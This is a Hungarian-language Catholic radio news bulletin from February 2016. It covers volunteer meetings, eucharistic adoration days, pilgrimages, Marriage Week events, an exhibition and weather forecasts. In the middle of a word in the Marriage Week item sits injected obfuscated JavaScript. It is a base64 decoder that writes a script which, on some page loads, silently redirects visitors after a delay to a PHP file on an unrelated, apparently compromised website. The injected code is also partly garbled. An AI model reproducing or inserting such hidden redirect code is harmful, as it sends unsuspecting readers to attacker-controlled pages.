2016. február 3. – Hírek és programajánló

H Í R E K   E S T E

Mária rádiós önkéntestalálkozók
Elkezdődtek az önkéntestalálkozók idei sorozata. A nagyváradi után, holnap a kolozsvári vételkörzet hallgatóit várjuk délután négy órára, a Szent Mihály Nőszövetség dísztermébe (Szentegyház utca 2. szám), majd február 5-én, pénteken délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián tartjuk találkozónkat, melyen jelen lesz rádiónk műsorigazgatója, Karácson Tibor atya is. Február 6-án, elsőszombaton, délután három órától Csíksomlyón, a kolostor épületébe várják önkénteseinket Szilágyi László promóciós munkatársunk, valamint Karácson Tibor műsorigazgató, majd Kászonújfaluban, a délután öt órás szentmise végén közönségtalálkozóra kerül sor. A további helyszínekről hírműsorainkban folyamatos tájékoztatást adunk.

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében holnap Aranyosgyéresen várják a híveket az Oltáriszentségben jelen levő Krisztus imádatára az örökös szentségimádási nap alkalmából.
A nagyváradi egyházmegyében újraéledt örökös szentségimádási nap hagyományának megfelelően február hónap első vasárnapján, 7-én, Nagyváradon a Szent Katalin-telepi plébániatemplomban lesz a híveknek lehetősége a szentségimádásba bekapcsolódni.

Szentévi zarándoklati nap Nagyváradon
Az Irgalmasság Évében a Nagyváradi Római Katolikus Egyházmegye zarándoklatra várja a híveket a székesegyházhoz, hogy a megnyitott Szent Kapun átlépve Isten irgalmasságára tekintsenek és maguk is a megújulás útjára lépjenek. Az előzetesen összeállított beosztásnak megfelelően, holnap, február 4-én, délután öt órakor a Várad-Környéki Esperesi Kerület hívei zarándokolnak a székesegyházhoz. A szentmise főcelebránsa Böcskei László megyéspüspök, az ünnepi szónok pedig Rajna József főesperes, fugyivásárhelyi plébános. A zarándoklati napon Nagyvárad többi templomában az esti szentmisék elmaradnak.

Pedagógusok a kiégésről
Negyedik alkalommal szervez találkozót pedagógusoknak a szatmári Püspökség Világiak Irodája. Február 13-án, szombaton, 10-14 óra között a pedagógusokat és más, segítő szakmákban tevékenységet folytatókat várnak egy előadásra. A pedagógustalálkozók folytatásaként megvalósuló rendezvényen Gyímesné Márkó Etelka fejlesztő pedagógus a kiégésről beszél majd, felvázolja ennek folyamatát, okait, fázisait, a megelőzés lehetőségeit. Mindezt interaktívan teszi, a személyes motivációkra, -attitűdökre való rátekintéssel, felülvizsgálva mindennapi rutinjainkat és keresve az új forrás-lehetőségeket. Az előadást követően beszélgetés kezdődik majd.
A Scheffler János Lelkipásztori Központ udvaráról elérhető Szent István teremben megrendezésre kerülő előadásra várják a jelentkezéseket holnapig a lepedusistvan@yahoo.com email címen.

Ifjúság vasárnapja a Gyulafehérvári Főegyházmegyében
Tizenhat éve, hogy a gyulafehérvári egyházmegyében a farsang utolsó vasárnapját az ifjúság vasárnapjának tartják. Minden korban kihívást jelentett az ifjúsági lelkipásztorkodás, ezért a sokrétű munkát az Ifjúsági Főlelkészség koordinálja, aki idén is változatos programokkal készül a fiatalok számára. Ezen pasztorációs tevékenységek támogatására lesz gyűjtés február 7-én, vasárnap, a Gyulafehérvári Főegyházmegye templomaiban. Várják a hívek jószándékú hozzájárulását!

Házasság hete egyházmegyéinkben
Február 7-14. között ötödik alkalommal kerül megrendezésre a Házasság hete, a következő mottóval: A szeretet: szenvedély és döntés.
A gyulafehérvári egyházmegyében, Székelyudvarhelyen idén is sokféle programra hívják a házasokat: kettesben eltöltött vacsora, filmnézés, szentségimádás, keresztút, tanúságtételek. A különböző rendezvényekre előzetes bejelentkezés szükséges. Csíkszentdomonkoson a következő programokkal várják a házasokat: házaspárok bálja, filmest, keresztút a családokért, előadások, szentmise. Marosvásárhelyen és Marosszentgyörgyön is sokszínű a választék a családok számára: előadások, párbeszédek, meghitt vacsorák, ima és böjtnap, szentmise. A részletes programokat, illetve elérhetőségeket minden helyszínről a gyulafehérvári érsekség honlapján találhatnak.
A szatmári egyházmegyében is érdekes programokkal várják a házasokat, családokat: házas kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtúra, filmvetítés, előadások, keresztút. Részletes információkat, illetve elérhetőségeket a különböző programokra való jelentkezéshez a szatmariegyhazmegye.ro oldalon találhatnak.

Az időjárásról: Mától erős hidegfront érkezik jelentős esővel, erős széllel. A front mögött holnapra felszakadozik a felhőzet, kisüt a nap, legfeljebb néhol fordulhat elő futó zápor, hózápor. Hajnalban sokfelé fagyhat. A leghidegebb az erdélyi medencében lesz, itt -9 C fok is előfordulhat. +HŐMÉRS.

MRE - Hírszolgálat, 2016. február 3.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében ma Alsójárán  várják a híveket az Oltáriszentségben jelen levő Krisztus imádására az örökös szentségimádási nap alkalmából.

Csíksomlyón zárták a szerzetesek évét   
Tegnap, Gyertyaszentelő Boldogasszony ünnepén ért véget a megszentelt élet éve. Az Erdélyi Főegyházmegye a csíksomlyói kegytemplomban ünnepi szentmisével zárta a szerzetesek évét, melyet Jakubinyi György érsek mutatott be. A szentmisén a főegyházmegye területén szolgáló szerzetesek és szerzetesnők is részt vettek. Szentbeszédében az érsek kihangsúlyozta: a szerzetesi élet lényege meglátni az üdvösséget és ezt a meglátott üdvösséget hírdetni másoknak is. Az ünnephez kapcsolódva kiemelte, hogy a gyertya is jelképezi a szerzetesi életet: vílágít, szeretetet, melegséget áraszt önmagát felemésztve. Végül az érsek arra bíztatta a megszentelt életet élőket: legyenek égő gyertyák, óvják a lángját, hogy mindhalálig tudják teljesíteni azt a hívatást, amit fogadalommal is vállaltak.

Mária rádiós önkéntestalálkozók
Ma kezdődik az önkéntestalálkozók idei sorozata: Nagyváradon a rádió székhelyén este hat órai kezdettel. Holnap a kolozsvári vételkörzet hallgatóit várjuk délután négy órára, a Szent Mihály Nőszövetség dísztermébe (Szentegyház utca 2. szám), majd február 5-én, pénteken délelőtt tizenegy órától Gyergyószentmiklóson a Szent Miklós plébánián tartjuk találkozónkat, melyen jelen lesz rádiónk műsorigazgatója, Karácson Tibor atya is.
Várjuk önkénteseinket tehát ma Nagyváradon, holnap Kolozsváron, pénteken pedig Gyergyószentmiklóson. A további helyszínekről  hírműsorainkban folyamatos tájékoztatást adunk.

Egy év ima-hálaadás
Az erdélyi Mária Rádió székelyudvarhelyi stúdiója és a Szent Pio lelkigyakorlatos ház közös kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak. Egy esztendeje, hogy elindult az egész napos szentségimádás is, amely során reggel nyolc órától este nyolc óráig folyamatos imádság zajlik. Az átimádkozott esztendőért ma délután hat órától hálaadó szentmisét mutatnak be, Balázs-áldással a végén.

Felelősségteljes élet reményében
Február 6-áig látogatható Sepsiszentgyörgyön az Olt utca 8. szám alatt a Kontrasztkiállítás. Eddig a tárlatot Erdélyben több mint 7000 fiatal tekintette meg, Sepsiszentgyörgyön az első hetekben közel 1200 látogató volt. Nagy volt az érdeklődés, elsősorban vallástanárok és osztályfőnökök hozták el diákjaikat, akik a kiállítás által rálátást kaphattak korunk legégetőbb problémáira, valamint az egyház által nyújtott megoldási lehetőségekre. A prevenciós kiállítás tulajdonképpen egy kiáltás az életért és a családokért, amely a látogató minden érzékszervét megdolgoztatja, de elsősorban elgondolkodtat, és igyekszik pozitív döntéshez segíteni a fiatalokat, ugyanis a fiatalok és a családok életét érintő legfontosabb kérdéseket hozza felszínre, méghozzá kíméletlenül őszintén. A Kontrasztkiállítás valójában multimédiás műhely, amelynek anyagát a Kisvárdai Református Ifjúság és a magyar rendőrség állította össze. Így – sok más értéke mellett – különlegessége, hogy a preventív tartalmú üzeneteket fiatalok fogalmazták meg fiatalok számára. Ez a kiállítás egy hatalmas sikoly. Nem simogat, hanem felráz, nem udvarias, hanem kiált ott, ahol a legtöbben némán maradnak, építeni akar azokon a pontokon, ahol a fiatalok életében legnagyobb a rombolás.
Hét témakört dolgoz fel, mint a családon belüli erőszak, káros szenvedélyek (alkohol, kábítószer), öngyilkosság, abortusz stb. Az utolsó stáció adja a feloldozást a megváltás jegyében. Ennek az anyagnak a segítségével érthetjük meg azt, hogy mit is jelent valójában az evangélium üzenete: „úgy szerette Isten a világot, hogy az ő egyszülött Fiát adta, hogy aki hisz őbenne, el ne vesszen, hanem örök élete legyen” (Jn 3,16). A kiállítás következő helyszine Marosludas lesz.-tudtuk meg az erdely.ma honlapjáról.

Ifjúság vasárnapja a Gyulafehérvári Főegyházmegyében
Tizenhat éve farsang utolsó vasárnapját, az ifjúság vasárnapjának nevezik. Az ifjúsági lelkipásztorkodás minden korban kihívást jelentett, munkáját az Ifjúsági Főlelkészség koordinálja. Február 7-én, vasárnap a Gyulafehérvári Főegyházmegye templomaiban az ifjúsági pasztorációs tevékenységek támogatására gyűjtés lesz.

Hálaadás és könyvbemutató Gyulafehérváron
Február 13-án, délelőtt tizenegy órakor a gyulafehérvári székesegyházban hálaadó szentmisét mutatnak be Jakubinyi György érsek születésének hetvenedik évfordulója alkalmából. Ezt követően az Erdélyi Magyar Egyházirodalmi Iskola szervezésében a Szeminárium Aula Magnájában Tamás József segédpüspök köszönti az érsek atyát, majd dr. Marton József nagyprépost bemutatja Márton Áron könyvsorozatának újabb kötetét, melyben a boldogemlékű püspök román minisztériumokkal és kormányhivatalokkal folyatott levelezéseit dolgozta fel. Az eseményt a Seminarium Incarnatae Sapientiae YouTube csatornáján élőben lehet követni.

Az időjárásról: Ma országszerte borult időre készülhetünk, egy újabb hidegfront hoz többfelé esőt, záport. Helyenként feltámad az északi, északnyugati szél. Enyhe hajnalra számíthatunk, napközben 8-16 fok várható. Az ország déli részén lesz a legmelegebb, itt akár 19 C fokot is mérhetünk.

MRE - Hírszolgálat, 2016. február 3.

About the author

maradmin

Leave a Comment